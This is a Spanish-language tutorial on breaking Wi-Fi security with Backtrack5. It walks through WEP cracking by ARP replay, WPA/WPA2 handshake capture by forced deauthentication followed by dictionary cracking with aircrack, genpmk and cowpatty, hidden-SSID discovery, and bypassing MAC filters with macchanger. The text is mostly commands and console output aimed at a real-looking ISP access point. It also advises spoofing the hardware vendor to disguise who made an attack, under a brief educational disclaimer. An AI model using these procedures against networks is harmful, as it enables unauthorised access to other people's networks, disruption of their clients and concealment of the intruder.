Criptado y Crackeo Wep (mtodo de aceleracin: Airodump,Aireplay,Aircrack);

Criptado y Crackeo WPA/WPA2 (mtodo de aceleracin :Aircrack,Genpmk,Cowpatty);

Como descubrir un punto de acceso invisible (Hidden SSID);
Como clonar una direccin MAC;
Como evitar los filtros MAC;

Mihai Valentin Dumitru

 Those who escape hell, however, never talk about it and nothing
much bothers them after that.
Charles Bukowski

Vulnerabilidades WLAN(WEP/WPA/WPA2/PSK)

Antes de poner en prctica toda la informacin que contiene este manual, deberan pensar
cul es el motivo de su uso. Este manual ha sido creado con fines estrictamente educativos y los que
utilicen esta informacin para lograr objetivos que podran considerarse no muy ticos, asumirn
tanto la responsabilidad como las consecuencias de sus hechos.
Para poder aplicar toda esta informacin, se requiere un equipo dotado con una plataforma
Backtrack5. Este Sistema Operativo, se puede descargar accediendo a la pgina oficial de Backtrack
http://www.backtrack-linux.org/downloads/ . Es aconsejable instalar el sistema en el equipo, pero
como alternativa, o crear una maquina virtual y ejecutar el Backtrack a travs de la misma mquina
virtual.
Contando con el hecho de que la teora y la prctica son independientes, vamos a empezar con
la prctica intentando explicar y debatir, en paralelo, todo lo que implica esta parte.
Vamos a empezar abriendo la consola (terminal) Backtrack y creando una interfaz de
monitorizacin mon0. Para poder crear la interfaz de monitorizacin, vamos a introducir en la
consola Backtrack5 el comando airmon-ng start wlan0

root@bt:~# airmon-ng start wlan0

Interface Chipset Driver

wlan0 (Fabricant) (driver)

(monitor mode enabled on mon0)

Para comprobar si la interfaz ha sido creada con xito introducimos airmon-ng.

root@bt:~# airmon-ng
Interface Chipset Driver

wlan0 (Fabricant) (driver)

mon0 (Fabricant)

Tambin se puede comprobar introduciendo ifconfig. En el caso en el que se haya creado con xito,
la interfaz mon0 ser mostrada en la consola:
root@bt:~# ifconfig
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask 255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric 1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrer:0

mon0 Link encap:UNSPEC Hwaddr:00:02:A5:B8:B0:53:00:00:00:00:00:00:00:00

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3794 errors:0 dropped:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrer:0

wlan0 Link encap Ethernet Hwaddr:00:02:A5:B8:B0:53

UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrer:0
colissions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

Criptado WEP y el metodo de crackeo:

Suponiendo que ya hemos activado una interfaz de monitorizacin mon 0, vamos a escanear
los alrededores para poder localizar un punto de acceso (AP-Access Point).
Para ello, introduciremos el comando airodump-ng mon0

root@bt:~# airodump-ng mon0

CH11 ][ Elapsed : 40 s ][ Data/Ora ]

BSSID PWR RXQ Beacons #Data , #s CH Mb ENC CIPHER AUTH ESSID

1C:1D:67:10:06:E5 -10 70 7206 88 0 11 54. WEP WEP Romtelecom

BSSID STATION PWR Rate Lost Packet Probes

1C:1D:67:10:06:E5 06:02:A8:C8:C0:23 -20 0 -1 0 3 Romtelecom

Vamos a elegir el punto de acceso con ESSID Romtelecom y MAC 1C:1D:67:10:06:E5 e

iniciaremos el proceso de captura de paquetes de datos introduciendo el comando:

airodump-ng bssid 1C:1D:67:10:06:E5 c 11 w crackromtelecom mon0

-bssid la direccin MAC del punto de acceso Romtelecom

-c 11 -el canal 11 o la frecuencia de emisin del punto de acceso Romtelecom
-w crackromtelecom el nombre del archivo en el que se almacenaran los paquetes de datos

root@bt:~# airodump-ng bssid 1C:1D:67:10:06:E5 c 11 w crackromtelecom mon0

CH11 ][ Elapsed : 1 min 25 s ] [ Data/Ora ][ 140 bytes keystream 1C:1D:67:10:06:E5 ]

BSSID PWR RXQ Beacons #Data , #s CH Mb ENC CIPHER AUTH ESSID

1C:1D:67:10:06:E5 -13 70 9206 168 0 11 54. WEP WEP Romtelecom

BSSID STATION PWR Rate Lost Packet Probes

1C:1D:67:10:06:E5 06:02:A8:C8:C0:23 -26 0-1 0 20 Romtelecom

Podemos ver que ya existe un cliente conectado al punto de acceso Romtelecom. Este mismo
cliente nos ayudara a obtener el volumen de datos (#Data) necesario para poder llevar a cabo el
proceso de crackeo.
A lo largo del tiempo, he observado muchos tutoriales dedicados a la explotacin de este tipo
de vulnerabilidades, pero a la vez, he observado que la mayora de los que publicaron los tutoriales
no aplicaron el mtodo de aceleracin del mismo proceso. Porque?
A continuacin, intentare explicar, en la medida de mis posibilidades, como aplicar este
proceso tan necesario e imprescindible. Digo imprescindible, porque el mtodo de aceleracin nos
ayudara a reducir el tiempo empleado de horas a minutos (5-10 minutos).
Iniciamos la captura de paquetes de datos ARP (ARP Packets) utilizando el comando aireplay-
ng. La misma utilidad, nos ayudara a reproducir e inyectar los paquetes capturados en la red,
obteniendo, de esta forma, el volumen de datos necesario para llevar a cabo el proceso de crackeo.
Cuntos ms paquetes ARP se capturen y se reproduzcan, ms aumentamos el flujo de datos en
la red, reduciendo de esta forma, el tiempo empleado. He de mencionar que el protocolo ARP, es un
protocolo que contiene un volumen de datos preestablecido e igual en todos los casos.
Utilizando esta informacin, vamos a poder reconocer y distinguir los paquetes ARP incluidos
en el trfico de datos de la red.

Para ello, abrimos otra consola e introducimos el comando:

aireplay-ng -3 b 1C:1D:67:10:06:E5 h 06:02:A8:C8:C0:23 mon0

root@bt:~# aireplay-ng -3 b 1C:1D:67:10:06:E5 h 06:02:A8:C8:C0:23 mon0

root@bt:~# aireplay-ng -3 b 1C:1D:67:10:06:E5 h 06:02:A8:C8:C0:23 mon0

The interface MAC (00:02:A5:B8:B0:53) doesnt match the specified MAC (-h).
Ifconfig mon0 hw ether 06:02:A8:C8:C0:23
4:02:27 Waiting for beacon frame (BSSID: 1C:1D:67:10:06:E5) on channel 11
Saving ARP requests in replay_arp-10-037987.cap
You should also start airodump-ng to capture replies.
Read 7032 packets (got 2016 ARP requests and 2010 ACKs), sent 1934 packets(500 pps)

-3 la opcin para la reproduccin de paquetes ARP packets;

-b La direccin MAC del punto de acceso (router);
-h La direccin MAC del cliente (ordenador) a el que le vamos a utilizar a reproducir los paquetes
ARP

Mirando la consola en la que se est ejecutando airodump-ng vais a ver que el volumen de datos
esta aumentado, debido al proceso de aceleracin generado por la utilidad aireplay
CH11 ][ Elapsed : 3 min 25 s ][ Data/Ora ][ 140 bytes keystream 1C:1D:67:10:06:E5 ]

BSSID PWR RXQ Beacons #Data , #s CH Mb ENC CIPHER AUTH ESSID

1C:1D:67:10:06:E5 -13 70 19206 16825 0 11 54. WEP WEP Romtelecom

BSSID STATION PWR Rate Lost Packet Probes

1C:1D:67:10:06:E5 06:02:A8:C8:C0:23 -26 0-1 0 20 Romtelecom

Abrid una consola (terminal) nueva e introducid el comando aircrack-ng crackromtelecom-01.cap

-crackromtelecom-01.cap es el archivo en el que se estn almacenando los paquetes de datos.

NOTA: Aunque hayamos introducido el comando aircrack-ng crackromtelecom-01.cap, este archivo

seguir almacenando los paquetes de datos, tal y como veremos a continuacin, sin que importe si
no hemos logrado obtener a la primera, la clave wifi (WEPKEY).

root@bt:~# aircrack-ng crackromtelecom-01.cap

Opening crackromtelecom-01.cap
Read 168992 packets.

# BSSID ESSID Encryption

1 1C:1D:67:10:06:E5 Romtelecom WEP (12336 IVs)

Choosing first network as target.

Opening crackromtelecom-01.cap
Reading packets, please wait

Los resultados mostrados en la consola sern mas o menos similares a los resultados que salen en la
imagen siguiente. Hemos decidido sustituir los valores reales por X por razones comprensibles.

Aircrack-ng 1.0

[00:00:00] Tested XXXXXX keys (got 12456 IVs)

KB depth byte(vote)
0 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256)
1 0/ 1 XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 256) XX( 256)
2 0/ 1 XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256)
3 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512)
4 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512)
5 0/ 1 XX( 512) XX( 256) XX( 256) XX( 512) XX( 512) XX( 256) XX( 256)
6 0/ 1 XX( 512) XX( 256) XX( 256) XX( 512) XX( 256) XX( 256) XX( 512)
7 0/ 1 XX( 768) XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512)
8 0/ 1 XX( 256) XX( 512) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256)
9 0/ 1 XX( 768) XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512)
10 0/ 1 XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256)
11 0/ 1 XX( 768) XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512)
12 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512)
Es muy probable que no obtengamos la contrasea (clave WEP) a la primera.

Aircrack-ng 1.0

[00:00:00] Tested XXXXXX keys (got 12500 IVs)

KB depth byte(vote)
1 0/ 1 XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256)
2 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512)
3 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512)
4 0/ 1 XX( 512) XX( 256) XX( 256) XX( 512) XX( 512) XX( 256) XX( 256)
5 0/ 1 XX( 512) XX( 256) XX( 256) XX( 512) XX( 256) XX( 256) XX( 512)
6 0/ 1 XX( 768) XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512)

Failed. Next try with 15000 IVs

No tenis porque preocuparos, normalmente, el proceso de crackeo puede llegar a durar horas,
y depende totalmente, del volumen de datos capturados y reinyectados en la red.
Pero, al haber invocando la utilidad <aireplay> vamos a reducir el tiempo empleado de horas a
minutos.
Analicemos la sintaxis Failed. Next try with 15000 IVs donde IV (Initialization Vector).
El proceso de crackeo se ha detenido porque todava no hemos logrado obtener el volumen de datos
necesario para el clculo de la clave WEP.
El mismo proceso se reiniciara en cuanto el numero de vectores de inicializacin alcance el valor
15000, porque, una vez activada la utilidad <aircrack>, la misma utilidad, est configurada para
reiniciar un proceso de clculo de la clave WEP cada 5000 IV.
En cuanto dispongamos de un numero de paquetes de datos suficiente, <aircrack> calculara la
clave WEP y la mostrara en la consola, tal y como veremos en la imagen siguiente.

Aircrack-ng 1.0

[00:00:00] Tested XXXXXX keys (got 20756 IVs)

KB depth byte(vote)
0 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256)
1 0/ 1 XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 256) XX( 256)
2 0/ 1 XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256)
3 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512)
4 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512)
5 0/ 1 XX( 512) XX( 256) XX( 256) XX( 512) XX( 512) XX( 256) XX( 256)
6 0/ 1 XX( 512) XX( 256) XX( 256) XX( 512) XX( 256) XX( 256) XX( 512)
7 0/ 1 XX( 768) XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512)
8 0/ 1 XX( 256) XX( 512) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256)
9 0/ 1 XX( 768) XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512)
10 0/ 1 XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256)
11 0/ 1 XX( 768) XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512)
12 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512)

KEY FOUND [ XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX ]

Decrypted correctly : 100%

Para poder descifrar (crackear) la clave WEP de un punto de acceso, en nuestro caso
Romtelecom, lo nico que necesitaremos, es capturar, reproducir (simular) y reinyectar un nmero
suficiente de paquetes de datos.
Una contrasea WEP se puede calcular sin que importe el nmero de caracteres o la complexidad
de la misma.
Criptado WPA/WPA2 y el mtodo de crackeo:
WPA es un protocolo de seguridad que utiliza como algoritmo de cifrado el TKIP (Temporal Key
Integrity Protocol). Hemos de mencionar que tanto el protocolo WEP como el WPA utilizan el mismo
Algoritmo de cifrado para encriptar los paquetes de datos, con la nica diferencia, que el WPA
genera las claves de otra manera.
WPA2 fue diseado para mejorar la versin WPA, utilizando como algoritmo de cifrado el AES
(Advanced Encryption Standard). Tal y como veremos a continuacin, tanto el protocolo WPA como
el WPA2, son vulnerables a un ataque de diccionario.
Para poder llevar a cabo con xito un ataque a WPA/WPA2 vamos a necesitar dos factores:

1. Un diccionario bien definido que contenga frases especificas de la zona geogrfica (pais) en la
que os encontris.
2. El segundo factor consta en capturar un saludo de 4 vas (WPA Handshake).

A continuacin vamos a explicar y analizar el mtodo de funcionamiento del saludo a 4 vas:

 Muchos llegaran a preguntarse Que es un PTK o como se genera?.

PTK (Paiwise Transition Keys) es una clave de cifrado que se utiliza en el proceso WPA y se obtiene
concatenando los siguientes factores:

1. La direccin MAC del punto de acceso (router);

2. La direccin MAC del cliente(ordenador);
3. La PMK o (PSK);
4. El valor (Anonce) generado por el punto de acceso;
5. El valor (Snonce) generado por el cliente;

Antes de empezar el proceso de crackeo, hemos de saber que, tanto el procedimiento como los
pasos que tenemos que seguir para obtener la clave, serian los mismos sin importar de que
protocolo se tratase (WPA/WPA2).

Suponiendo que ya hemos configurado el punto de acceso Romtelecom para que aplicase una
proteccin WPA, vamos a abrir una consola e introduciremos la orden siguiente:

airodump-ng bssid 1C:1D:67:10:06:E5 c 11 w crackromtelecomWPA mon0

root@bt:~# airodump-ng bssid 1C:1D:67:10:06:E5 c 11 w crackromtelecomWPA mon0

CH11 ][ Elapsed : 1 min 05 s ] [ Data/Ora ]

BSSID PWR RXQ Beacons #Data , #s CH Mb ENC CIPHER AUTH ESSID

1C:1D:67:10:06:E5 -15 70 1206 10 0 11 54. WPA TKIP Romtelecom

BSSID STATION PWR Rate Lost Packet Probes

Como habamos dicho, para poder iniciar un ataque a diccionario, necesitaremos capturar el
saludo a 4 vas que se efecta entre un cliente y el punto de acceso. Este saludo se realiza en el
momento en el que el cliente intenta conectarse al punto de acceso.
Para ello tendramos que coincidir con un cliente o simplemente obligar a los clientes que ya
estn conectados al punto de acceso Romtelecom, a desconectarse y as capturar el saludo a 4 vas
que realizara al volver a conectarse al punto de acceso. Para ello vamos a efectuar un ataque de
autenticacin (DOS) siguiendo 2 pasos:

1. Abriendo o consola nueva Backtrack;

2. Ejecutando la orden aireplay-ng -deauth 1 a 1C:1D:67:10:06:E5 mon 0

root@bt:~# aireplay-ng -deauth 1 a 1C:1D:67:10:06:E5 mon 0

06:20:06 Waiting for beacon frame (BSSID 1C:1D:67:10:06:E5) on channel 11
NB:This attack is more effective when targeting a connected wireless client(-c <clients MAC>).
06:20:06 Sending DeAuth to broadcast - BSSID: [1C:1D:67:10:06:E5]
root@bt:~#

En cuanto el cliente intentara conectarse, al haber sido obligado a desconectarse tras el ataque de
de autenticacin DOS, la utilidad <airodump> que ya se esta ejecutando, capturara el saludo a 4
vas.

La confirmacin ser mostrada en la esquina superior derecha de la consola:

CH11 ][ Elapsed : 16 min 05 s ] [ Data/Ora ][ WPA Handshake 1C:1D:67:10:06:E5 ]

BSSID PWR RXQ Beacons #Data , #s CH Mb ENC CIPHER AUTH ESSID

1C:1D:67:10:06:E5 -16 70 3566 108 0 11 54. WPA TKIP

Romtelecom

BSSID STATION PWR Rate Lost Packet Probes

1C:1D:67:10:06:E5 06:02:A8:C8:C0:23 -32 0-1 0 30 Romtelecom

Una vez obtenido el saludo a 4 vas, WPA Handshake 1C:1D:67:10:06:E5 iremos a la consola
en la que se est ejecutando la utilidad <airodump> e interrumpiremos el proceso pulsando Ctrl-C.

Antes de iniciar el proceso de crackeo hemos de saber que, en el caso de un ataque

WPA/WPA2, la eficacia del ataque depende en su totalidad del diccionario de l que dispondrais.
Backtrack5 contiene un diccionario almacenado en un archivo llamado darKcode.lst, pero a lo largo
del tiempo hemos observado que el mismo diccionario no es muy eficaz a la hora de efectuar un
ataque a un punto de acceso situado en Europa de Este y tampoco en la Europa Central o de Oeste
(Espaa,Francia,Italia).
Aun as, os puedo asegurar que, gracias a la colaboracin de los grupos de Anonymous que
activan en zonas distintas del planeta, se han realizado varios diccionarios que contienen frases
especificas de las dichas zonas.
Puesto que este manual ha sido creado con fines educativos y demonstrativos, nos vamos a
limitar a utilizar el mismo diccionario del Backtrack5.
Para acceder al diccionario vamos a tener que introducir en una consola el siguiente comando:

aircrack-ng crackromtelecomWPA.cap w /pentest/passwords/wordlists/darkc0de.lst

root@bt:~# aircrack-ng crackromtelecomWPA.cap w /pentest/passwords/wordlists/darkc0de.lst

Aircrack-ng 1.0

[00:00:00] Tested 876890 keys (726.6 k/s)

KEY FOUND! [XXXXXXXXX]

Master Key: XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX
XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX

Transient Key: XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX
XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX
XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX
XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX

EAPOL HMAC: XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX

Una vez calculada la clave, la misma clave se mostrara en la consola KEY FOUND! [XXXXXXXXX]
 A continuacin debatiremos el mtodo de aceleracin del proceso de crackeo:
Para poder acelerar el proceso de crackeo WPA y a la vez reducir el tiempo empleado vamos a
tener que calcular el valor del factor PMK (Pairwise Master Key) o PSK (Pre-shared key) es decir, la
clave precompartida. El factor PMK (PSK) se obtiene concatenando otros dos factores importantes:

1. El valor SSID (en nuestro caso Romtelecom);

2. La clave;

Para ello utilizaremos un generador PMK llamado genpmk abriendo una consola e introduciendo
el comando:

genpmk -f /pentest/passwords/wordlists/darkc0de.lst d PMK-crackromtelecomWPA

-s Romtelecom

root@bt:~# genpmk -f /pentest/passwords/wordlists/darkc0de.lst d PMK-crackromtelecomWPA

-s Romtelecom
genpmk 1.1 WPA-PSK precomputation atack. <jwright@hasborg.com>
File PMK-crackromtelecomWPA does not exist, creating.
key no. 1000:XXXXXXX
key no. 2000:XXXXXXXXX
key no. 3000:XXXXX
key no. 4000:XXXXXXXX
key no. 5000:XXXXXXX
key no. 6000:XXXXXXXXXX

Puesto que ya tenemos la PMK, vamos a extraer la contrasea WIFI ejecutando la utilidad cowpatty.
Para ello introducimos el comando:

cowpatty d PMK-crackromtelecomWPA s Romtelecom r crackromtelecomWPA-01.cap

root@bt:~# cowpatty d PMK-crackromtelecomWPA s Romtelecom r crackromtelecomWPA-

01
.cap
Collected all necessary data to mount crack against WPA/PSK passphrase.
Starting dictionary atack. Please be patient.

key no. 1000:XXXXXXX

key no. 2000:XXXXXXXXX
key no. 3000:XXXXX
key no. 4000:XXXXXXXX
key no. 5000:XXXXXXX
key no. 6000:XXXXXXXXXX
key no. 7000:XXXXXXXX
key no. 8000:XXXXXXXX
key no. 9000:XXXXXXX
key no. 10000:XXXXXXXX
key no. 11000:XXXXXX
key no. 12000:XXXXXXXX
key no. 13000:XXXXXXXXXXX
key no. 14000:XXXXXXXXX
key no. 15000:XXXXXXXXXX
key no. 16000:XXXXXXXXXXXX
key no. 17000:XXXXXXXXX
key no. 18000:XXXXXXXXXXXXXX
En cuanto se haya calculado con xito la contrasea, se mostrara en la consola:

key no. 111000:XXXXXXX

key no. 112000:XXXXXXXXX
key no. 113000:XXXXX
key no. 114000:XXXXXXXX
key no. 115000:XXXXXXX
key no. 116000:XXXXXXXXXX
key no. 117000:XXXXXXXX
key no. 118000:XXXXXXXX
key no. 119000:XXXXXXX
key no. 120000:XXXXXXXX
key no. 121000:XXXXXX
key no. 122000:XXXXXXXX

The PSK is XXXXXXXX

122000 passphrases tested in [X] seconds. [X] passphrases/sec

Como descubrir un punto de acceso invisible (Hidden SSID)

Vamos a ver lo fcil que es descubrir un punto de acceso invisible (Hidden SSID)
Para ello vamos a tener que ejecutar la utilidad <airodump>.

CH11 ][ Elapsed : 0 min 05 s ] [ Data/Ora ][

BSSID PWR RXQ Beacons #Data , #s CH Mb ENC CIPHER AUTH ESSID

1C:1D:67:10:06:E5 -16 70 3566 108 0 11 54e WPA TKIP Romtelecom

28:EF:01:35:32:64 -42 17 0 0 6 11 54e WPA TKIP <length: 6>

BSSID STATION PWR Rate Lost Packet Probes

28:EF:01:35:32:64 06:02:A8:C8:C0:23 -32 0-1 0 30 <length: 6>

El mtodo consta en esperar a que un cliente (ordenador) autorizado se conecte al punto de

acceso invisible. Cada vez que un cliente autorizado intenta conectarse a un punto de acceso
invisible el mismo cliente genera una solicitud de prueba (Probe request). El punto de acceso
(router) recibir la solicitud del cliente y le mandara al mismo cliente un respuesta de prueba (Probe
response).
Tanto la solicitud como la respuesta contienen la SSID del punto de acceso, delatando de esta
manera, la presencia del punto de acceso invisible
El punto de acceso invisible se mostrara en la pantalla.<length: 6>.
Como engaar el filtrado MAC (MAC Filters)

El filtrado MAC es una medida de seguridad que cuenta con un listado que contiene las
direcciones MAC de los clientes autorizados.
Todos los dems dispositivos, cuyas direcciones MAC no estn incluidas en el listado de filtrado
MAC, gestionado por el administrador de red, no obtendrn la autorizacin para poder conectarse al
punto de acceso.
A continuacin vamos a ver lo fcil que es engaar los filtros MAC, clonando la direccin MAC de
un cliente autorizado.

En una consola BackTrack/Linux, vamos a introducir el comando:

airodump-ng c11 a bssid <MAC_punto_de_acceso> mon0

En nuestro caso utilizaremos un punto de acceso con ESSID Romtelecom y cuya direccin MAC
sera 1C:1D:67:10:06:E5:

root@bt:~# airodump-ng c11 a bssid 1C:1D:67:10:06:E5 mon0

El resultado mostrado en la pantalla sera el siguiente:

CH11 ][ Elapsed : 40 s ][2013

BSSID PWR RXQ Beacons #Data , #s CH Mb ENC CIPHER AUTH ESSID

1C:1D:67:10:06:E5 -7 90 206 18 0 11 54e OPN

Romtelecom

BSSID STATION PWR Rate Lost Packet Probes

1C:1D:67:10:06:E5 06:02:A8:C8:C0:23 -14 0 -1 0 3 Romtelecom

Donde:

-c 11 El canal o la frecuencia de emisin del punto de acceso;

-a Esta opcin mostrar en la pantalla solamente las direcciones MAC de los clientes que ya han
obtenido una autorizacin para poder conectarse.

En cuanto la utilidad <airodump> muestra en la pantalla una direccin MAC de un cliente

autorizado, en nuestro caso 06:02:A8:C8:C0:23, cambiaremos la direccin MAC de nuestro
dispositivo por la direccin del dispositivo autorizado.
Para ello hemos de seguir 4 pasos:

1. Vamos a tener que desactivar la interfaz wlan0:

ifconfig wlan0 down

2. Cambiamos la direccin MAC de nuestro dispositivo por la direccin MAC del cliente
autorizado:

macchanger -m 06:02:A8:C8:C0:23 wlan0

root@bt:~# macchanger -m 06:02:A8:C8:C0:23 wlan0
Current MAC: 00:02:A5:B8:B0:53 (Fabricant)
Faked MAC: 06:02:A8:C8:C0:23 (Fabricant)

3. Volvemos a activar la interfaz wlan0;

ifconfig wlan0 up

4. Comprobamos si el cambio se ha realizado con xito:

macchanger --show wlan0

root@bt:~# macchanger --show wlan0

Current MAC: 06:02:A8:C8:C0:23 (Fabricant)

NOTA:
Tal y como habis visto, la direccin MAC de vuestro dispositivo inalmbrico se puede cambiar
sin problema alguno.
Digamos que vuestro dispositivo inalmbrico es un dispositivo fabricado por CISCO y a la hora
de efectuar un ataque queris que conste que estis utilizando un dispositivo fabricado, por ejemplo
por INTEL o cualquier otro fabricante.
En una consola ejecutad el comando:

macchanger list

Veris que en la misma consola se mostrara un listado con la mayora de los fabricantes y que a
la vez contiene la huella MAC del mismo. Por ejemplo la huella MAC de INTEL es 00:90:27.
Para cambiar la direccin MAC de CISCO por una de INTEL introducid:

macchanger --mac 00:90:27:11:11:11 wlan0

00:90:27 la huella del fabricante;

Every person, I suppose ,has their eccentricities but in an effort to be normal

in the worlds eye ,they overcome them and therefore destroy they special calling.
Ive kept mine and do believe that they have lent generously to my existence..

Charles Bukowski

mihaivalentindumitru@gmail.com